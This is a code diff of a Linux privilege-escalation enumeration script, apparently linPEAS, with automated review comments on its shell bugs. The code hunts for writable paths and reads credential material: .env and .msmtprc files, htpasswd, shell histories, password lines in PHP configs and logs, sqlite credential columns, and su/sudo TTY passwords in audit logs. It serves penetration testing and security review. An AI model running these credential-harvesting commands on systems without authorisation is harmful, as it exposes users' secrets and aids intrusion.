"$NC - if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else echo_no fi 
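Review bot: In the `Hashes inside passwd file?` check the condition was tightened to `[x\*\!]` and no longer reads `/etc/pwd.db`, but the command that prints the result still uses `[x\*]` and still includes `/etc/pwd.db`, so the report can show `!`-locked entries as hashes or print pwd.db lines that never satisfied the test. Run the grep once and reuse it: `pwhashes=\`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null\`` followed by `if [ "$pwhashes" ]; then printf '%s\n' "$pwhashes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"`. If dropping `/etc/pwd.db` is intentional it should be dropped from both lines.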
@@ -2400,40 +2888,40 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Root files in home dirs printf $Y"[+] "$GREEN"Searching root files in home dirs (limit 30)\n"$NC - (find /home /Users -user root 2>/dev/null | head -n 30 | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found echo "" ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then printf $Y"[+] "$GREEN"Searching folders owned by me containing others files on it\n"$NC - (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IF) Readable files belonging to root and not world readable if ! [ "$IAMROOT" ]; then printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found + (find / -type f -user root ! 
-perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found echo "" fi ##-- IF) Modified interesting files into specific folders in the last 5mins printf $Y"[+] "$GREEN"Modified interesting files in the last 5mins (limit 100)\n"$NC - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | head -n 100 | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m," + find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," echo "" ##-- IF) Writable log files printf $Y"[+] "$GREEN"Writable log files (logrotten) (limit 100)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation\n"$NC logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeE" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` printf "$logfind\n" | while read log; do if [ -w "$log" ] || [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; - elif [ -w "$log" ] && [ "`which logrotate`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif [ -w "$log" ] && [ "`command -v 
logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif [ -w "$log" ]; then echo "Writable: $log"; - elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g"; + elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g"; fi fi done @@ -2447,7 +2935,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Files inside /home printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC - (find /home /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo "" ##-- IF) Mail applications 
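Review bot: The logrotate version test on the changed `Writable:` line, `grep -E ' 1| 2| 3.1'`, is unanchored, so ` 3.1` also matches `3.10` through `3.19` and ` 1`/` 2` match any later token of the banner; a current logrotate can therefore be flagged red as a vulnerable version. If the banner starts with `logrotate <version>`, anchor the match to that field, e.g. `grep -E '^logrotate ([12]\.|3\.1$|3\.1[^0-9])'`, and state the intended upper bound in the `#Check vuln version` comment, which currently does not say which versions are meant. The `2>&1` on `logrotate --version` also lets error text reach the grep, so a failing binary can still match.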
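Review bot: The filter `grep -v -i "/"$USER` on the new `find $HOMESEARCH /Users -type f` line is a substring match, so for a user named `ann` it also hides `/home/anna/` and `/home/annexe/`, and the unquoted `$USER` is word-split. Matching the full path component, `grep -v -i "/$USER/"`, keeps the intent while quoting the expansion.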
@@ -2457,40 +2945,48 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Mails printf $Y"[+] "$GREEN"Mails (limit 50)\n"$NC - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f 2>/dev/null | head -n 50) || echo_not_found + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed "s,root,${C}[1;32m&${C}[0m,g") || echo_not_found + echo "" + + ##-- IF) Backup folders + printf $Y"[+] "$GREEN"Backup folders\n"$NC + printf "$backup_folders\n" | while read b ; do + ls -ld "$b" 2> /dev/null + ls -l "$b" 2>/dev/null && echo "" + done echo "" ##-- IF) Backup files - printf $Y"[+] "$GREEN"Backup files?\n"$NC + printf $Y"[+] "$GREEN"Backup files\n"$NC backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` printf "$backs\n" | while read b ; do if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | sed -E "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; fi; done echo "" ##-- IF) DB files printf $Y"[+] "$GREEN"Searching tables inside readable .db/.sql/.sqlite files (limit 100)\n"$NC - dbfiles=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 100) - FILECMD="`which file`" + dbfiles=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 
100) + FILECMD="`command -v file 2>/dev/null`" if [ "$dbfiles" ]; then printf "$dbfiles\n" | while read f; do if [ "$FILECMD" ]; then - echo "Found: `file \"$f\"`" | sed -E "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; else - echo "Found: $f" | sed -E "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; fi done SQLITEPYTHON="" printf "$dbfiles\n" | while read f; do if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "`which sqlite3 2>/dev/null`" ]; then + if [ "`command -v sqlite3 2>/dev/null`" ]; then tables=`sqlite3 $f ".tables" 2>/dev/null` #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" - elif [ "`which python 2>/dev/null`" ] || [ "`which python3 2>/dev/null`" ]; then - SQLITEPYTHON=`which python 2>/dev/null || which python3 2>/dev/null` + elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then + SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" else 
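Review bot: `dbfiles=$(echo "$FIND_VAR\n$FIND_ETC\n…" | grep -E '.*\.db$|…')` relies on `echo` expanding `\n`; bash's builtin `echo` (without `-e`) emits the two characters literally, so the last entry of one list and the first of the next are glued onto one line and the `$`-anchored patterns miss both, whereas dash's `echo` does expand it — the result depends on which shell runs the script, which the hunk does not pin. `printf '%s\n' "$FIND_VAR" "$FIND_ETC" "$FIND_HOME" "$FIND_TMP" "$FIND_OPT" "$FIND_USR" "$FIND_PRIVATE" "$FIND_APPLICATIONS" | grep -E …` joins them unambiguously. The same `echo "…\n…"` joiner is introduced for `fils=` in the `Readable hidden interesting files` hunk and for `configs=` in the `Passwords in config PHP files` hunk.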
@@ -2509,8 +3005,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then #Check found columns for interesting fields INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"` if [ "$INTCOLUMN" ]; then - printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -E "s,user.*|credential.*,${C}[1;31m&${C}[0m,g" - printf "$columns\n" | sed -E "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g" + printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${C}[1;31m&${C}[0m,g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g" (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head fi done 
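Review bot: On the changed `Found interesting column names` line, `$t` — a table name read from an arbitrary readable `.db`/`.sqlite` file — is interpolated into printf's format string and, one line later, into the `sed -${E}` alternation, so a name containing `%`, `\` or regex metacharacters garbles the output or aborts the sed. Pass it as an argument instead, `printf $B" --> Found interesting column names in$NC %s $DG(output limit 10)\n"$NC "$t"`, and escape it before appending it to the sed pattern. The `for t in …` loop and the `if [ "$INTCOLUMN" ]` branch begin outside this hunk.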
@@ -2530,27 +3026,35 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Interesting files - printf $Y"[+] "$GREEN"Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml\n"$NC + printf $Y"[+] "$GREEN"Readable hidden interesting files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC - fils=$(echo "$FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_MNT $FIND_VAR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv|Dockerfile|docker-compose\.yml') + fils=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_MNT\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '\.msmtprc|\.env|\.google_authenticator|\.recently-used.xbel|\.lesshst|.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv') printf "$fils\n" | while read f; do if [ -r "$f" ]; then - ls -ld "$f" 2>/dev/null | sed "s,_history|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|Dockerfile|docker-compose.yml|\.viminfo|\.ldaprc,${C}[1;31m&${C}[0m," | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g"; + ls -ld "$f" 2>/dev/null | sed "s,\.msmtprc|\.env|.google_authenticator|_history|\.lesshst|.recently-used.xbel|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|\.ldaprc,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed 
"s,root,${C}[1;31m&${C}[0m,g"; if [ "`echo \"$f\" | grep \"_history\"`" ]; then printf $GREEN"Searching possible passwords inside $f (limit 100)\n"$NC - cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100 + cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100 echo "" elif [ "`echo \"$f\" | grep \"httpd.conf\"`" ]; then printf $GREEN"Checking for creds on $f\n"$NC - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -E "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -${E} "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m," echo "" elif [ "`echo \"$f\" | grep \"htpasswd\"`" ]; then printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," echo "" elif [ "`echo \"$f\" | grep \"ldaprc\"`" ]; then printf $GREEN"Reading $f\n"$NC - cat "$f" | grep -v "^#" | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "" + elif [ "`echo \"$f\" | grep \"\.env\"`" ]; then + printf $GREEN"Reading $f\n"$NC + cat "$f" | grep -v "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${C}[1;31m&${C}[0m," + echo "" + elif [ "`echo \"$f\" | grep \"\.msmtprc\"`" ]; then + printf $GREEN"Reading $f\n"$NC + cat "$f" | grep -v "^#" | sed -${E} "s,user.*|password.*,${C}[1;31m&${C}[0m," echo "" fi; fi; 
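Review bot: The first highlight on the `ls -ld "$f"` line, `sed "s,\.msmtprc|\.env|.google_authenticator|…|\.ldaprc,${C}[1;31m&${C}[0m,"`, runs without `-${E}`, so in basic regex syntax `|` is a literal character and the alternation never matches — the extended list the commit adds is never coloured, while every neighbouring highlight in the hunk uses `sed -${E}`. Adding `-${E}` to that call fixes it. Separately, the new `grep "\.env"` branch also fires for any path containing `.env` (such as `.environment`), which is harmless but worth a `\.env$` anchor if the branch is meant for dotenv files only.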
@@ -2559,12 +3063,12 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) All hidden files printf $Y"[+] "$GREEN"All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)\n"$NC - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -v "_history$|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|.depend|.placeholder|.gitkeep|.keep" | head -n 70 + find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -v "\.env|\.google_authenticator|_history$|\.recently-used.xbel|\.lesshst|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|.depend|.placeholder|.gitkeep|.keep" | head -n 70 echo "" - ##-- IF) Readable files in /tmp, /var/tmp, /var/backups - printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /var/backups, /private/tmp /private/var/at/tmp /private/var/tmp (limit 70)\n"$NC - filstmpback=`find /tmp /var/tmp /var/backups /private/tmp /private/var/at/tmp /private/var/tmp -type f 2>/dev/null | head -n 70` + ##-- IF) Readable files in /tmp, /var/tmp, bachups + printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)\n"$NC + filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70` printf "$filstmpback\n" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" 
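Review bot: In `All hidden files`, the exclusion `grep -v "\.env|\.google_authenticator|_history$|…|.keep"` uses basic regex syntax, where `|` is literal, so none of the listed names is excluded and the heading's promise ("not … the ones listed in the previous check") does not hold; the commit extends the list without changing this. Use `grep -Ev "…"`, the same form the `Backup files` check already uses with `$notExtensions`. Also `bachups` in the new `##-- IF)` comment should read `backups`.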
@@ -2573,13 +3077,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "10"){print "#)You_can_write_even_more_files_inside_last_directory"}; pre=act }' | head -n500` + obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "$obmowbe\n" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -E "s,$writeVB,${C}[1;31;103m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," else - echo "$entry" | sed -E "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," fi done echo "" 
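Review bot: The awk marker is now emitted with an embedded `"\n"`, and the consumer on the next line, `printf "$obmowbe\n" | while read entry`, treats the whole find output as printf's format string, so it not only expands that escape but also interprets `%` directives and `\` sequences inside any file or directory name found under `/` — a world-writable path whose name contains `%s` corrupts or truncates the listing precisely where the check matters. Iterate with `printf '%s\n' "$obmowbe" | while read -r entry; do` and let the marker stay a plain line. The same `printf "$var\n" | while read` shape drives the group loop in the next hunk (`$iwfbg`) and the `$logfind`, `$backup_folders`, `$backs`, `$dbfiles`, `$fils`, `$filstmpback` and `$configs` loops elsewhere in this diff.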
@@ -2591,13 +3095,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC for g in `groups`; do printf " Group "$GREEN"$g:\n"$NC; - iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 10){ print line_init; } if (cont == "10"){print "#)You_can_write_even_more_files_inside_last_directory"}; pre=act }' | head -n500` + iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "$iwfbg\n" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -E "s,$writeVB,${C}[1;31;103m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," else - echo "$entry" | sed -E "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," fi done done 
@@ -2606,8 +3110,14 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords in config PHP files printf $Y"[+] "$GREEN"Searching passwords in config PHP files\n"$NC - configs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*config.*\.php') - printf "$configs\n" | while read c; do grep -i "password.* = ['\"]\|define.*passw\|db_pass" $c 2>/dev/null | grep -v "function\|password.* = \"\"\|password.* = ''" | sed '/^.\{150\}./d' | sort | uniq | sed -E "s,[pP][aA][sS][sS][wW][oO][rR][dD]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done + configs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*config.*\.php|database.php|db.php|storage.php|settings.php') + printf "$configs\n" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done + echo "" + + ##-- IF) TTY passwords + printf $Y"[+] "$GREEN"Checking for TTY (sudo/su) passwords in audit logs\n"$NC + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${C}[1;31m&${C}[0m,g" + grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${C}[1;31m&${C}[0m,g" | sed -${E} "s,data=.*,${C}[1;31m&${C}[0m,g" echo "" ##-- IF) IPs inside logs 
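Review bot: The new `TTY passwords` check runs `grep -RE 'comm="su"|comm="sudo"' /var/log*` recursively with no `timeout`, no `-I` and no `head`, unlike the adjacent log searches (`timeout 100 grep -R … | head -n 70`), so on a host with large or binary logs it can stall the whole run or dump unbounded binary output; `/var/log*` also matches any sibling such as `/var/log.old` rather than only `/var/log/`. Bound it the same way: `timeout 100 grep -RIE 'comm="su"|comm="sudo"' /var/log/ 2>/dev/null | head -n 70 | sed …`. In the config loop just above, the new `grep -EiI "…" $c` also leaves `$c` unquoted.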
@@ -2617,44 +3127,51 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords inside logs printf $Y"[+] "$GREEN"Finding passwords inside logs (limit 70)\n"$NC - (timeout 100 grep -R -i "pwd\|passw" /var/log/ /private/var/log) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -E "s,pwd|passw,${C}[1;31m&${C}[0m," + (timeout 100 grep -R -i "pwd\|passw" /var/log/ /private/var/log) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${C}[1;31m&${C}[0m," echo "" ##-- IF) Emails inside logs printf $Y"[+] "$GREEN"Finding emails inside logs (limit 70)\n"$NC - (timeout 100 grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" /var/log/ /private/var/log) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -E "s,$knw_emails,${C}[1;32m&${C}[0m,g" + (timeout 100 grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" /var/log/ /private/var/log) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} 